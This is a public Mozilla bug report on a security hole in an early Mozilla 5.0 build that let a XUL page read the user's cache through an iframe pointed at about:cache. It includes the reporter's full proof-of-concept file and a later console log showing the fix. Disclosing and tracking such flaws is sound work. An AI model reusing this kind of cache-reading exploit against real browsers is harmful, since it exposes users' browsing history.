Closed Bug 9810 Opened 26 years ago Closed 26 years ago

Reading user's cache using XUL and iframe

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

Details

There is a security vulnerability in Mozilla 5.0 M7 Win95 (guess all platforms), which allows reading user's cache using XUL and iframe. The code is: ----------------------------------cache2.xul-------------------------- <?xml version="1.0"?> <!-- <?xml-stylesheet href="xul.css" type="text/css"?> --> <!DOCTYPE window> <xul:window xmlns:html="http://www.w3.org/TR/REC-html40" xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul" title = "Reading user's cache"> <html:script> <![CDATA[ function dumpCache() { dump("Here are some URLs from your cache:\n"); for(i=0;i<10;i++) dump(window.frames[0].document.links[i].href+"\n"); } ]]> </html:script> <xul:toolbox> <xul:toolbar> <xul:titledbutton value="Press me to dump cache" onclick="dumpCache()" style="background-color:rgb(192,192,192);"/> </xul:toolbar> </xul:toolbox> <html:hr/> <html:iframe type="content-primary" src="about:cache" /> <html:h3> Press the button and look at the apprunner console to see some URLs in your cache. </html:h3> </xul:window> ----------------------------------------------------------------------
Status: NEW → ASSIGNED
Target Milestone: M11
Blocks: 12633
Group: netscapeconfidential?
Component: Browser-General → Security
QA Contact: leger → dshea
Updating component
Depends on: 11462
Depends on: 7254
No longer depends on: 11462
Fixed. Now we get an error from the URL checks: ->>>>>>>>>>>>>> Write Clipboard to memory ->>>>>>>>>>>>>> Read Clipboard from memory Opening file signon.tbl failed FindShortcut: in='http://prime/gunxul/cache1.xul ' out='null' JavaScript Error: illegal URL method 'about:cache' URL: http://prime/gunxul/cache1.xul LineNo: 4 JavaScript Error: uncaught exception: [Exception... "Failure" code: "-214746725 9" nsresult: "0x80004005 (NS_ERROR_FAILURE)" location: "http://prime/gunxul/cac he1.xul Line: 4"] Document http://prime/gunxul/cache1.xul loaded successfully Document: Done (0.657 secs)
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
Status: RESOLVED → VERIFIED
Windows NT 1999120208 Comm Verified
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.